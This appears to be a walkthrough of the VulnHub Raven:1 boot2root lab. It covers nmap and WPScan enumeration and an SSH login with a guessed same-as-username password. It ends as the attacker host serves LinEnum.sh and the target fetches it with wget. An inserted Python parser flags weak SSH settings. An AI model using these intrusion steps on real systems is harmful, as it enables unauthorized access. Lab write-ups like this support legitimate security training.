VulnHub machine walkthrough [Raven-1]

Name

Name: Raven:1
Release date: 14 August 2018

Download

  • Download: https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW
  • Download (Mirror): https://download.vulnhub.com/raven/Raven.ova
  • Download (Torrent): https://download.vulnhub.com/raven/Raven.ova.torrent

Description

Raven is a beginner/intermediate boot2root machine. There are four flags to find and two intended ways to get root. It was built with VMware and tested on VirtualBox, and is set up to use NAT networking.

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.118
Host is up (0.00016s latency).
MAC Address: 08:00:27:D2:E6:4F (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -sV -v -Pn 192.168.56.118
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
36286/tcp open status 1 (RPC #100024)

root@kali:~# nmap -p- -sU -Pn -v 192.168.56.118 --min-rate=10000
PORT STATE SERVICE
111/udp open rpcbind

root@kali:~# nmap -p 22,80,111,36286 -sV -v -Pn -A --script all 192.168.56.118 --min-rate=100000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 0 guesses in 1807 seconds, average tps: 0.0
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
| ssh-publickey-acceptance:
|_ Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
| ssh2-enum-algos:
| kex_algorithms: (6)
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group14-sha1
| server_host_key_algorithms: (4)
| ssh-rsa
| ssh-dss
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| chacha20-poly1305@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-brute:
|_ Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 284.71ms; min: 236.36ms; max: 327.61ms
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118
|
| Path: http://192.168.56.118:80/about.html
| Line number: 16
| Comment:
| <!-- Site Title -->
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 112
| Comment:
|
|
| */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 3425
| Comment:
| /*
| ################
| End Blog Details Page style
| ################
| */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 1989
| Comment:
| /* Nav Menu Essentials */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2028
| Comment:
| /* Nav Menu Arrows */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 10
| Comment:
| /* Code for Firefox */
|
| Path: http://192.168.56.118:80/about.html
| Line number: 196
| Comment:
| <!-- Start team Area -->
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 81
| Comment:
|
|
| */
|
| Path: http://192.168.56.118:80/about.html
| Line number: 12
| Comment:
| <!-- Meta Keyword -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 150
| Comment:
| <!-- #colophon -->
|
| Path: http://192.168.56.118:80/js/jquery.counterup.min.js
| Line number: 1
| Comment:
| /*!
| * jquery.counterup.js 1.0
| *
| * Copyright 2013, Benjamin Intal http://gambit.ph @bfintal
| * Released under the GPL v2 License
| *
| * Date: Nov 26, 2013
| */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 106
| Comment:
| /**
| * Typography
| *
| **/
|
| Path: http://192.168.56.118:80/js/waypoints.min.js
| Line number: 2
| Comment:
| /*
| jQuery Waypoints - v2.0.3
| Copyright (c) 2011-2013 Caleb Troughton
| Dual licensed under the MIT license and GPL license.
| https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt
| */
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 15
| Comment:
| // request type html/json/xml
|
| Path: http://192.168.56.118:80/about.html
| Line number: 4
| Comment:
| <!-- Mobile Specific Meta -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 1
| Comment:
| /*--------------------------- Color variations ----------------------*/
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 7
| Comment:
| /* Basic Style
| /* =================================== */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 47
| Comment:
| /* Microsoft Edge */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2208
| Comment:
| /* Mobile Nav body classes */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 107
| Comment:
| <!-- #main -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2057
| Comment:
| /* Nav Meu Styling */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 75
| Comment:
| <!-- .site-branding -->
|
| Path: http://192.168.56.118:80/contact.php
| Line number: 148
| Comment:
| <!-- End contact-page Area -->
|
| Path: http://192.168.56.118:80/index.html
| Line number: 291
| Comment:
| <!-- End galery Area -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 156
| Comment:
| /* ]]> */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 129
| Comment:
|
|
| */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 154
| Comment:
| /* <![CDATA[ */
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 8
| Comment:
|
| // Website: http://labs.anthonygarand.com/sticky
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 152
| Comment:
| <!-- #page -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 34
| Comment:
| /* Mozilla Firefox 19+ */
|
| Path: http://192.168.56.118:80/js/superfish.min.js
| Line number: 1
| Comment:
| /*
| * jQuery Superfish Menu Plugin - v1.7.9
| * Copyright (c) 2016 Joel Birch
| *
| * Dual licensed under the MIT and GPL licenses:
| * http://www.opensource.org/licenses/mit-license.php
| * http://www.gnu.org/licenses/gpl.html
| */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 4
| Comment:
| /* Mobile Layout: 320px */
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 6
| Comment:
|
| // Created: 2/14/2011
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 27
| Comment:
| /* Mozilla Firefox 4 to 18 */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 141
| Comment:
| <!-- #content -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 80
| Comment:
| <!-- #masthead -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 137
| Comment:
| <!-- #secondary -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 105
| Comment:
| <!-- #post-## -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 108
| Comment:
| <!-- #primary -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 102
| Comment:
| <!-- .entry-content -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 97
| Comment:
| <!-- .entry-header -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 16
| Comment:
| // serialize form data
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 6
| Comment:
| /* =================================== */
|
| Path: http://192.168.56.118:80/index.html
| Line number: 210
| Comment:
| <!-- End feature Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 3
| Comment:
| /* Tablet Layout: 768px */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 77
| Comment:
| /* No Js */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 118
| Comment:
|
|
| */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 77
| Comment:
| <!-- .custom-header -->
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 140
| Comment:
| // should be more efficient than using $window.scroll(scroller) and $window.resize(resizer):
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 21
| Comment:
| /* WebKit, Blink, Edge */
|
| Path: http://192.168.56.118:80/js/jquery.magnific-popup.min.js
| Line number: 1
| Comment:
| /*! Magnific Popup - v1.1.0 - 2016-02-20
| * http://dimsemenov.com/plugins/magnific-popup/
| * Copyright (c) 2016 Dmitry Semenov; */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2
| Comment:
| /* Medium Layout: 1280px */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 70
| Comment:
| <!-- .site-branding-text -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 14
| Comment:
| <!-- meta character set -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 269
| Comment:
| <!-- start footer Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 41
| Comment:
| /* Internet Explorer 10-11 */
|
| Path: http://192.168.56.118:80/css/linearicons.css
| Line number: 22
| Comment:
| /* Better Font Rendering =========== */
|
| Path: http://192.168.56.118:80/about.html
| Line number: 74
| Comment:
| <!-- start banner Area -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 39
| Comment:
| <!--[if lt IE 9]>
| <script type='text/javascript' src='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3'></script>
| <![endif]-->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 36
| Comment:
| <!--[if lt IE 9]>
| <link rel='stylesheet' id='twentyseventeen-ie8-css' href='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/css/ie8.css?ver=1.0' type='text/css' media='all' />
| <![endif]-->
|
| Path: http://192.168.56.118:80/js/jquery.nice-select.min.js
| Line number: 1
| Comment:
| /* jQuery Nice Select - v1.0
| https://github.com/hernansartorio/jquery-nice-select
| Made by Hern\xC3\xA1n Sartorio */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 6
| Comment:
|
|
| */
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 97
| Comment:
| <!-- .entry-meta -->
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 29
| Comment:
| /* fix for flashing background */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 13
| Comment:
| /* position relative and z-index fix webkit rendering fonts issue */
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2101
| Comment:
| /* Mobile Nav Toggle */
|
| Path: http://192.168.56.118:80/index.html
| Line number: 368
| Comment:
| <!-- End blog Area -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 20
| Comment:
| <!--
| CSS
| ============================================= -->
|
| Path: http://192.168.56.118:80/js/parallax.min.js
| Line number: 1
| Comment:
| /*!
| * parallax.js v1.5.0 (http://pixelcog.github.io/parallax.js/)
| * @copyright 2016 PixelCog, Inc.
| * @license MIT (https://github.com/pixelcog/parallax.js/blob/master/LICENSE)
| */
|
| Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js
| Line number: 103
| Comment:
| // Translate and display submit message
|
| Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js
| Line number: 69
| Comment:
| // Translate and display message
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 151
| Comment:
| <!-- .site-content-contain -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 10
| Comment:
| // prevent default form submit
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 148
| Comment:
| <!-- .site-info -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 23
| Comment:
| // reset form
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 22
| Comment:
| // fade in response data
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 14
| Comment:
| // form submit method get/post
|
| Path: http://192.168.56.118:80/about.html
| Line number: 10
| Comment:
| <!-- Meta Description -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 68
| Comment:
| <!-- #nav-menu-container -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 19
| Comment:
| // change submit button text
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 167
| Comment:
| /**
| * For modern browsers
| * 1. The space content is one way to avoid an Opera bug when the
| * contenteditable attribute is included anywhere else in the document.
| * Otherwise it causes space to appear at the top and bottom of elements
| * that are clearfixed.
| * 2. The use of `table` rather than `block` is only necessary if using
| * `:before` to contain the top-margins of child elements.
| */
|
| Path: http://192.168.56.118:80/index.html
| Line number: 150
| Comment:
| <!-- Start feature Area -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 13
| Comment:
| // form action url
|
| Path: http://192.168.56.118:80/about.html
| Line number: 280
| Comment:
| <!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 4
| Comment:
|
| // Improvements by German M. Bravo (Kronuz) and Ruud Kamphuis (ruudk)
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 8
| Comment:
| // form submit event
|
| Path: http://192.168.56.118:80/about.html
| Line number: 90
| Comment:
| <!-- Start about-top Area -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 167
| Comment:
| <!-- Start fact Area -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 111
| Comment:
| <!-- Start service Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 3306
| Comment:
| /*
| ################
| Start Blog Details Page style
| ################
| */
|
| Path: http://192.168.56.118:80/contact.php
| Line number: 89
| Comment:
| <!-- Start contact-page Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 3301
| Comment:
| /*
| ################
| End Blog Home Page style
| ################
| */
|
| Path: http://192.168.56.118:80/css/owl.carousel.css
| Line number: 1
| Comment:
|
|
|
|
| */
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 4
| Comment:
| // contact form
|
| Path: http://192.168.56.118:80/about.html
| Line number: 8
| Comment:
| <!-- Author Meta -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 267
| Comment:
| <!-- End team Area -->
|
| Path: http://192.168.56.118:80/wordpress/
| Line number: 74
| Comment:
| <!-- .wrap -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2046
| Comment:
| /* Nav Meu Container */
|
| Path: http://192.168.56.118:80/about.html
| Line number: 165
| Comment:
| <!-- End service Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 5
| Comment:
| /* Wide Mobile Layout: 480px */
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 5
| Comment:
| // submit button
|
| Path: http://192.168.56.118:80/about.html
| Line number: 318
| Comment:
| <!-- End footer Area -->
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 2
| Comment:
|
| // =============
|
| Path: http://192.168.56.118:80/about.html
| Line number: 110
| Comment:
| <!-- End about-top Area -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 194
| Comment:
| <!-- end fact Area -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 1
| Comment:
| // ------- Mail Send ajax
|
| Path: http://192.168.56.118:80/js/jquery.sticky.js
| Line number: 10
| Comment:
|
| // It will only set the 'top' and 'position' of your element, you
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 3065
| Comment:
| /*
| ################
| Start Blog Home Page style
| ################
| */
|
| Path: http://192.168.56.118:80/css/bootstrap.css
| Line number: 1
| Comment:
| /*!
| * Bootstrap v4.0.0-beta (https://getbootstrap.com)
| * Copyright 2011-2017 The Bootstrap Authors
| * Copyright 2011-2017 Twitter, Inc.
| * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
| */
|
| Path: http://192.168.56.118:80/index.html
| Line number: 293
| Comment:
| <!-- Start blog Area -->
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 1875
| Comment:
| /*--------------------------------------------------------------
| # Header
| --------------------------------------------------------------*/
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 2130
| Comment:
| /* Mobile Nav Styling */
|
| Path: http://192.168.56.118:80/about.html
| Line number: 6
| Comment:
| <!-- Favicon-->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 6
| Comment:
| // alert div for show alert message
|
| Path: http://192.168.56.118:80/css/main.css
| Line number: 1986
| Comment:
| /*--------------------------------------------------------------
| # Navigation Menu
| --------------------------------------------------------------*/
|
| Path: http://192.168.56.118:80/about.html
| Line number: 71
| Comment:
| <!-- #header -->
|
| Path: http://192.168.56.118:80/about.html
| Line number: 88
| Comment:
| <!-- End banner Area -->
|
| Path: http://192.168.56.118:80/js/mail-script.js
| Line number: 24
| Comment:
| // reset submit button text
|
| Path: http://192.168.56.118:80/index.html
| Line number: 241
| Comment:
|_ <!-- Start galery Area -->
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.118:80/
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.118:80/contact.php
| Form id: myform
| Form action:
|
| Path: http://192.168.56.118:80/contact.php
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.118:80/team.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.118:80/index.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.118:80/about.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.118:80/wordpress/
| Form id: search-form-5e446a40901ba
|_ Form action: http://raven.local/wordpress/
|_http-date: Wed, 12 Feb 2020 21:12:24 GMT; +8h00m00s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /manual/: Potentially interesting folder
|_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=192.168.56.118
| Found the following error pages:
|
| Error Code: 404
| http://192.168.56.118:80/blog-single.html
|
| Error Code: 404
| http://192.168.56.118:80/contact.html
|
| Error Code: 404
|_ http://192.168.56.118:80/wordpress/%5c%22
|_http-feed: ERROR: Script execution failed (use -d to debug)
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-grep:
| (1) http://192.168.56.118:80/contact.php:
| (1) email:
| + support@codethemes.com
| (1) http://192.168.56.118:80/blog-single.html:
| (1) ip:
|_ + 192.168.56.118
| http-headers:
| Date: Wed, 12 Feb 2020 21:12:23 GMT
| Server: Apache/2.4.10 (Debian)
| Last-Modified: Sun, 12 Aug 2018 22:29:32 GMT
| ETag: "41b3-5734482bdcb00"
| Accept-Ranges: bytes
| Content-Length: 16819
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
|_http-malware-host: Host appears to be clean
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-mobileversion-checker: No mobile version detected.
| http-referer-checker:
| Spidering limited to: maxpagecount=30
|_ https://cdnjs.cloudflare.com:443/ajax/libs/popper.js/1.12.9/umd/popper.min.js
|_http-security-headers:
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; html: 1
| /css/
| css: 6
| /img/
| jpg: 4; png: 1
| /js/
| js: 5
| /wordpress/
| Other: 1
| Longest directory structure:
| Depth: 1
| Dir: /css/
| Total files found (by extension):
|_ Other: 2; css: 6; html: 1; jpg: 4; js: 5; png: 1
|_http-slowloris: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Raven Security
| http-traceroute:
|_ Possible reverse proxy detected.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-vhosts:
| 126 names had status 200
|_ftp0
|_http-xssed: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36286/tcp status
| 100024 1 43516/udp status
| 100024 1 46344/udp6 status
|_ 100024 1 56752/tcp6 status
36286/tcp open status 1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
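The port 22 output above already contains what a hardening review needs: sshd offers password authentication, a SHA-1 based key exchange and MAC, and a DSA host key. As an added example (not from the original write-up), a small parser for the ssh-auth-methods and ssh2-enum-algos blocks that turns that NSE output into findings; the sample input is a constructed, trimmed excerpt of the scan above, and the LEGACY policy table is an assumption.

```python
import re

# Constructed sample: a trimmed copy of the port-22 NSE output from the scan above.
SAMPLE_NSE = """\
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh2-enum-algos:
| kex_algorithms: (4)
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group14-sha1
| server_host_key_algorithms: (3)
| ssh-rsa
| ssh-dss
| ssh-ed25519
| encryption_algorithms: (2)
| aes256-ctr
| chacha20-poly1305@openssh.com
| mac_algorithms: (3)
| hmac-sha2-256-etm@openssh.com
| hmac-sha1
|_ umac-64@openssh.com
"""

# Algorithms a hardening review would flag: SHA-1 based key exchange and MACs,
# DSA host keys, MACs with a 64-bit tag. Assumed policy list, not from the page.
LEGACY = {
    "kex_algorithms": {
        "diffie-hellman-group1-sha1",
        "diffie-hellman-group14-sha1",
        "diffie-hellman-group-exchange-sha1",
    },
    "server_host_key_algorithms": {"ssh-dss"},
    "mac_algorithms": {
        "hmac-md5", "hmac-sha1", "hmac-sha1-etm@openssh.com",
        "umac-64@openssh.com", "umac-64-etm@openssh.com",
    },
}

# A header line is "name:" optionally followed by an item count, e.g. "kex_algorithms: (6)".
HEADER_RE = re.compile(r"^([^:]+):\s*(?:\(\d+\))?$")


def parse_nse(text):
    """Map each NSE header (script name or algorithm class) to the list of
    items that follow it, from the '|'-prefixed block nmap prints."""
    sections, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        line = raw.lstrip("|_").strip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def review_ssh(text):
    """Return human-readable hardening findings for the scanned sshd."""
    sections = parse_nse(text)
    findings = []
    if "password" in sections.get("Supported authentication methods", []):
        findings.append("password authentication enabled; prefer publickey only")
    for cls, bad in LEGACY.items():
        for algo in sections.get(cls, []):
            if algo in bad:
                findings.append(f"{cls}: legacy algorithm {algo} offered")
    return findings


if __name__ == "__main__":
    for finding in review_ssh(SAMPLE_NSE):
        print("[!]", finding)
```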

Add the following to the attacking machine's hosts file:

192.168.56.118 raven.local

Visiting the URL below shows that the site is built on WordPress:

http://192.168.56.118/wordpress/

So the first idea is to run wpscan and see what it enumerates.

root@kali:~/vulnhub/raven1# wpscan --url http://192.168.56.118/wordpress/ --wp-content-dir -ep -et -eu
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.7.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.118/wordpress/
[+] Started: Fri Feb 14 04:34:24 2020

Interesting Finding(s):

[+] http://192.168.56.118/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.56.118/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.118/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.56.118/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.118/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.7'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.118/wordpress/, Match: 'WordPress 4.8.7'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

The scan returns the two users created on the target machine:

Michael and Steven

Getting a shell

Next, move on to port 22 (SSH). Using the same word as both username and password is a very logical thing to try. Logging in to SSH with "michael" as both username and password works and gives a shell!

root@kali:~# ssh michael@192.168.56.118
The authenticity of host '192.168.56.118 (192.168.56.118)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.118' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
michael@192.168.56.118's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
michael@Raven:~$ whoami
michael

Next, change directory to /tmp and pull in LinEnum.sh, a script that enumerates many basic and advanced Linux details. It is served from a folder on the local machine and fetched onto the target with wget.

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [14/Feb/2020 04:45:37] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [14/Feb/2020 04:45:41] "GET /LinEnum.sh HTTP/1.1" 200 -
192.168.56.118 - - [14/Feb/2020 04:46:02] "GET /LinEnum.sh HTTP/1.1" 200 -

michael@Raven:/tmp$ wget 192.168.56.102:8000/LinEnum.sh
--2020-02-15 04:46:01-- http://192.168.56.102:8000/LinEnum.sh
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46476 (45K) [text/x-sh]
Saving to: ‘LinEnum.sh’

